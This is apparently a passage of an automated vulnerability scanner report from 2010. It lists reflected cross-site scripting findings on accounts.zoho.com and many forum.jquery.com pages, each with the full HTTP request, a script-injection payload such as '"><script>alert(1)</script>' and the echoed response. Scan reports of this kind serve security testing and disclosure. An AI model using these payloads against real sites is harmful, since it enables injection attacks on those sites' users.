Host:   https://accounts.zoho.com
Path:   /login

Issue detail

The value of the serviceurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33bbc'%3b576998bc57a was submitted in the serviceurl parameter. This input was echoed as 33bbc';576998bc57a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login?service_language=default&hide_signup=true&servicename=ZohoDiscussions&serviceurl=http://forum.jquery.com33bbc'%3b576998bc57a HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://forum.jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: accounts.zoho.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=3ad80424-3c75-452b-8ceb-f86f7a918fac; Path=/
Set-Cookie: JSESSIONID=BBB8B69C0B24C0DD838C70BF6607C3A2; Path=/; Secure
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 16 Nov 2010 02:22:52 GMT
Server: ZWS
Content-Length: 21370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
://")==0){iurl=iurl.replace("http://", "https://");window.location.href=iurl;}
}


var enableReload = true;
var serviceurl = 'http://forum.jquery.com33bbc';576998bc57a';
var servicename ='ZohoDiscussions';
var domain_label='null';
var domain_suffix='null';
var partner_domain='null';
var hidesecure = 'null';
...[SNIP]...

1.3. http://forum.jquery.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dab2c"><script>alert(1)</script>70e709c8ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?dab2c"><script>alert(1)</script>70e709c8ab=1 HTTP/1.1
Accept: */*
Referer: http://jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forum.jquery.com
Proxy-Connection: Keep-Alive
Cookie: __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmb=44433727.3.10.1289872970; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=44433727

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=a0838b0d-1f5f-49ff-888a-ca10718e5891; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=53DA00C69F4980139C075CADB1530CED; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 16 Nov 2010 02:07:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 411905


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/?dab2c"><script>alert(1)</script>70e709c8ab=1&forumGroupUrl=jquery">
...[SNIP]...

1.4. http://forum.jquery.com/about-the-jquery-forum [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /about-the-jquery-forum

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a72cd"><script>alert(1)</script>44bd9229710 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-the-jquery-forum?a72cd"><script>alert(1)</script>44bd9229710=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D921CF006107F10E32B711DA86FDCE0E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:40:14 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/about-the-jquery-forum?a72cd"><script>alert(1)</script>44bd9229710=1&forumGroupUrl=jquery">
...[SNIP]...

1.5. http://forum.jquery.com/developing-jquery-mobile [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /developing-jquery-mobile

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c91cc"><script>alert(1)</script>c8ff90e20b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /developing-jquery-mobile?c91cc"><script>alert(1)</script>c8ff90e20b7=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=F8C6AB73BFDC1E6B361E4CAA27CBB1AF; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:40:23 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/developing-jquery-mobile?c91cc"><script>alert(1)</script>c8ff90e20b7=1&forumGroupUrl=jquery">
...[SNIP]...

1.6. http://forum.jquery.com/developing-jquery-plugins [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /developing-jquery-plugins

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97a2f"><script>alert(1)</script>c8203ea5f69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /developing-jquery-plugins?97a2f"><script>alert(1)</script>c8203ea5f69=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0F0DCA2C320392027ABA186A97DD53DC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:55 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/developing-jquery-plugins?97a2f"><script>alert(1)</script>c8203ea5f69=1&forumGroupUrl=jquery">
...[SNIP]...

1.7. http://forum.jquery.com/jquery-conferences [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /jquery-conferences

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c664"><script>alert(1)</script>0a9ecd3820d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jquery-conferences?4c664"><script>alert(1)</script>0a9ecd3820d=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=A717CC53521CA472F1F8C8E755D3B202; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:54 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/jquery-conferences?4c664"><script>alert(1)</script>0a9ecd3820d=1&forumGroupUrl=jquery">
...[SNIP]...

1.8. http://forum.jquery.com/jquery-mobile [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /jquery-mobile

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e53f7"><script>alert(1)</script>b4e2633d5c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jquery-mobile?e53f7"><script>alert(1)</script>b4e2633d5c3=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=399F4A95A26109EBB254C74243575CBF; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:40:18 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/jquery-mobile?e53f7"><script>alert(1)</script>b4e2633d5c3=1&forumGroupUrl=jquery">
...[SNIP]...

1.9. http://forum.jquery.com/qunit-and-testing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /qunit-and-testing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51e98"><script>alert(1)</script>74500080afe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /qunit-and-testing?51e98"><script>alert(1)</script>74500080afe=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=34312667F1724C24B1980DBAF3BCC187; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:40:05 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/qunit-and-testing?51e98"><script>alert(1)</script>74500080afe=1&forumGroupUrl=jquery">
...[SNIP]...

1.10. http://forum.jquery.com/topic/how-can-i-help-9-5-2010 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /topic/how-can-i-help-9-5-2010

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbc08"><script>alert(1)</script>b03536d5bca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/how-can-i-help-9-5-2010?fbc08"><script>alert(1)</script>b03536d5bca=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=C11475EE2D052BDA88A8901629E747D6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:38:40 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/how-can-i-help-9-5-2010?fbc08"><script>alert(1)</script>b03536d5bca=1&forumGroupUrl=jquery">
...[SNIP]...

1.11. http://forum.jquery.com/topic/looking-for-help-on-panel-development [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /topic/looking-for-help-on-panel-development

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4857d"><script>alert(1)</script>7f58095177f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/looking-for-help-on-panel-development?4857d"><script>alert(1)</script>7f58095177f=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=2A7E8B2ED43076766C482166352CCB09; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:38:40 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/looking-for-help-on-panel-development?4857d"><script>alert(1)</script>7f58095177f=1&forumGroupUrl=jquery">
...[SNIP]...

1.12. http://forum.jquery.com/user/andrew_powell [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/andrew_powell

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c977"><script>alert(1)</script>f5f11187efd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/andrew_powell?5c977"><script>alert(1)</script>f5f11187efd=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=3681D8CB43F3699E5F2AECE48990B00E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:35:20 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/user/andrew_powell?5c977"><script>alert(1)</script>f5f11187efd=1&forumGroupUrl=jquery">
...[SNIP]...

1.13. http://forum.jquery.com/user/charlietfl [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/charlietfl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61ea0"><script>alert(1)</script>59ffcd43a5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/charlietfl?61ea0"><script>alert(1)</script>59ffcd43a5c=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=10829BB619EFDFB10743E9E4EC66074F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:37:08 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/user/charlietfl?61ea0"><script>alert(1)</script>59ffcd43a5c=1&forumGroupUrl=jquery">
...[SNIP]...

1.14. http://forum.jquery.com/user/christophe [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/christophe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 357cf"><script>alert(1)</script>be52c97770b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/christophe?357cf"><script>alert(1)</script>be52c97770b=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=8E5124FF4A399FAE18C9A0C1EB3C9F96; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:37:43 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/user/christophe?357cf"><script>alert(1)</script>be52c97770b=1&forumGroupUrl=jquery">
...[SNIP]...

1.15. http://forum.jquery.com/user/jeresig [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/jeresig

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28ec1"><script>alert(1)</script>bc03636b9be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/jeresig?28ec1"><script>alert(1)</script>bc03636b9be=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=7D7D3E93CA4CEE946880A12D3580342F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:35:49 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/user/jeresig?28ec1"><script>alert(1)</script>bc03636b9be=1&forumGroupUrl=jquery">
...[SNIP]...

1.16. http://forum.jquery.com/user/kbwood.au [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/kbwood.au

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5770d"><script>alert(1)</script>6ebfd66aa15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/kbwood.au?5770d"><script>alert(1)</script>6ebfd66aa15=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=441BE2E2AB873EAEAFF092B48707C03E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:37:34 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/user/kbwood.au?5770d"><script>alert(1)</script>6ebfd66aa15=1&forumGroupUrl=jquery">
...[SNIP]...

1.17. http://forum.jquery.com/user/scottjehl [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/scottjehl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 621fb"><script>alert(1)</script>c784026de5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/scottjehl?621fb"><script>alert(1)</script>c784026de5e=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
